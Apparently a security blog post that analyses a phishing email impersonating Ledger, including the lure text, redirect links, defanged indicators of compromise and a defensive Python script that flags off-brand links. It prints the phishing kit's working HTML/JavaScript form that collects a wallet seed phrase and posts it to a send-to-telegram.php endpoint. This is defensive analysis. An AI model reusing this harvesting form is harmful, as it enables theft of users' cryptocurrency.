Phishing for hardware wallet keys

Published by Harald
phishing blockchain hardware wallet

One of my honeypot emails caught an interesting phishing email today:

From: Ledger <info.ledger[@]planet[.]com>
To: ******************
Subject: This is an automated email.
Date: 25 Sep 2024 04:04:11 +0200

    Dear customer,



    This is an automated email to inform you that 24-Word Seed Recovery to
    Electrum is initiated

    Please note that it can up to 24 hours to deliver all the funds to your new
    wallet. After that your funds cannot be accessed by Ledger hardware wallet
    anymore.

    If it wasn't you, report your recovery phrase immediately so our team can
    freeze the process in time. Otherwise just ignore thi email.

                                  [It wasn't me]



    We trust this information is sufficient.

    Do you have any questions about updating your details?
    Visit ledger[.]com/support/articles/How-to-update-my-profile.


                                  [512x512bb]

                                 © 2024 Ledger

                              support[@]ledger[.]com

Now, there are a couple of interesting things here:

It obviously targets users of hardware cryptocurrency wallets from Ledger. These are protected by a 24-word seed phrase that is used to derive your private keys. You should of course never reveal this phrase to anyone, as that gives them full access to your funds on whatever blockchain you're using.

The link [It wasn't me] does of course not lead to Ledger's site. The underlying HTML code is:

    <a href="hxxps://www[.]khojholidays[.]com/reddod.html">
        <a style="..." href="hxxps://jinkrupa[.]com/wp-admin/readme.html">It wasn't me</a>

I'm not sure if the first (unterminated) anchor element is intentional or not, or how different HTML rendering engines will handle it. In any case, both links lead to identical fake reCAPTCHA pages which, when you click the checkbox, redirect to ./wp-backup.php on the same site. This again redirects further to a form on a different site for entering the seed phrase. When the form is submitted, it invokes an action with the suggestive name send-to-telegram.php.
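One practical way to triage an email like this from the defender's side is to pull every anchor out of the HTML body and compare the link domains against the brand the message claims to come from. The script below is an added example, not code from the original post: it feeds the nested anchor snippet quoted above (re-armed from its hxxps/[.] defanging so that urlparse accepts it) through Python's permissive stdlib html.parser, which simply records both start tags regardless of the missing close tag, and then reports every href whose registrable domain is not ledger.com (the set of legitimate domains is an assumption here). It also extracts the sender domain from the From header so the two mismatches can be reported together.

```python
"""Triage links and sender domain in a suspected phishing email.

Added example, not part of the original post. Parses the nested
anchor snippet quoted in the post and flags links whose domain does
not belong to the impersonated brand.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed copy of the anchor HTML quoted in the post, with the
# defanging undone so the URLs parse. Note the unterminated first <a>.
EMAIL_HTML = """
<a href="https://www.khojholidays.com/reddod.html">
  <a style="color:#fff" href="https://jinkrupa.com/wp-admin/readme.html">It wasn't me</a>
"""

# Assumption: the brand the email impersonates; extend for other brands.
LEGIT_DOMAINS = {"ledger.com"}


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every <a> start tag.

    html.parser does not enforce nesting, so an unterminated <a> simply
    stays on the stack; text is attributed to the innermost open anchor.
    """

    def __init__(self):
        super().__init__()
        self.links = []   # list of [href, text]
        self._open = []   # stack of indices into self.links

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.links.append([dict(attrs).get("href", ""), ""])
            self._open.append(len(self.links) - 1)

    def handle_data(self, data):
        text = data.strip()
        if text and self._open:
            self.links[self._open[-1]][1] += text

    def handle_endtag(self, tag):
        if tag == "a" and self._open:
            self._open.pop()


def registrable_domain(url):
    """Last two host labels (e.g. jinkrupa.com). Good enough for .com;
    a production tool would consult the public suffix list."""
    host = urlparse(url).hostname or ""
    return ".".join(host.split(".")[-2:]).lower()


def defang(url):
    """Defang in the same style the post uses: hxxps:// and [.] in the host."""
    host = urlparse(url).hostname or ""
    return url.replace(host, host.replace(".", "[.]"), 1).replace("http", "hxxp", 1)


def sender_domain(from_header):
    """Domain part of a From: header such as 'Ledger <info.ledger@planet.com>'."""
    addr = from_header.split("<")[-1].rstrip(">").strip()
    return addr.rsplit("@", 1)[-1].lower()


def triage_links(html, legit_domains=LEGIT_DOMAINS):
    """Return one finding per anchor that points outside the legitimate domains."""
    parser = LinkExtractor()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        domain = registrable_domain(href)
        if domain not in legit_domains:
            findings.append({"href": defang(href), "text": text, "domain": domain})
    return findings


if __name__ == "__main__":
    print("sender domain:", sender_domain("Ledger <info.ledger@planet.com>"))
    for f in triage_links(EMAIL_HTML):
        print(f"off-brand link: {f['href']!r} (text: {f['text']!r})")
```

Both anchors are reported, which is the safe behaviour: whichever one a given mail client ends up activating, the domain is the indicator you want in your blocklist.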

Interestingly enough, the comments in the HTML/JavaScript code that renders the form are in a mixture of English and Dutch (translated to English below).

    <div class="container">
        <img src="hxxps://i[.]gyazo[.]com/b8fc2d6178e48c79ee3049bf389c5dc3.png" alt="Ledger Logo" class="ledger-logo">
        <h1>Ledger Recovery</h1>
        <p>Choose the length of your security phrase.</p>

        <select id="wordCount" onchange="generateInputFields()">
            <option value="12">12 words</option>
            <option value="18">18 words</option>
            <option value="24">24 words</option>
        </select>

        <form method="POST" action="send-to-telegram.php">
            <div id="wordInputContainer" class="word-input-container"></div>
            <button type="button" class="submit-btn" onclick="submitWords()">Continue</button>
        </form>
    </div>

    <script>
        function generateInputFields() {
            const wordCount = document.getElementById('wordCount').value;
            const container = document.getElementById('wordInputContainer');
            container.innerHTML = ''; // Clear existing fields

            for (let i = 1; i <= wordCount; i++) {
                const input = document.createElement('input');
                input.type = 'text';
                input.className = 'word-input';
                input.placeholder = i + '.'; // Placeholder showing the word number
                input.id = 'word' + i; // Unique ID for each input
                container.appendChild(input);
            }
        }

        function submitWords() {
            const wordCount = document.getElementById('wordCount').value;
            let words = [];

            for (let i = 1; i <= wordCount; i++) {
                const word = document.getElementById('word' + i).value; // Use the standard ID
                words.push(word); // Add the word to the array
            }

            // Create a hidden input field to pass the words on as an array
            const hiddenInput = document.createElement('input');
            hiddenInput.type = 'hidden';
            hiddenInput.name = 'words[]'; // The name as an array
            hiddenInput.value = JSON.stringify(words); // Convert the array to JSON
            document.querySelector('form').appendChild(hiddenInput);

            // Submit the form
            document.querySelector('form').submit();
        }

        // Initialise with 24 words
        generateInputFields();
    </script>

Above you can see the surprisingly clear and well documented code that generates the input form and passes the typed-in words, as a JSON array, to the send-to-telegram.php endpoint. This will most likely post any seed phrase to a Telegram channel monitored by whoever is behind this phishing campaign.

IOCs

  • info.ledger[@]planet[.]com
  • hxxps://www[.]khojholidays[.]com/reddod.html
  • hxxps://www[.]khojholidays[.]com/wp-backup.php
  • hxxps://jinkrupa[.]com/wp-admin/readme.html
  • hxxps://jinkrupa[.]com/wp-admin/wp-backup.php
  • hxxps://firmwareapp[.]myvnc[.]com/ld
  • hxxps://1edger[.]sytes[.]net/ld

Support my work!

If you would like to support my work analyzing exploits and auditing open source projects for vulnerabilities, you can do so by donating any amount you feel like via Stripe or Liberapay using the buttons below.

I'm also available for hire!

Send me an email, or contact me on the fediverse, and let me know what I can do for you.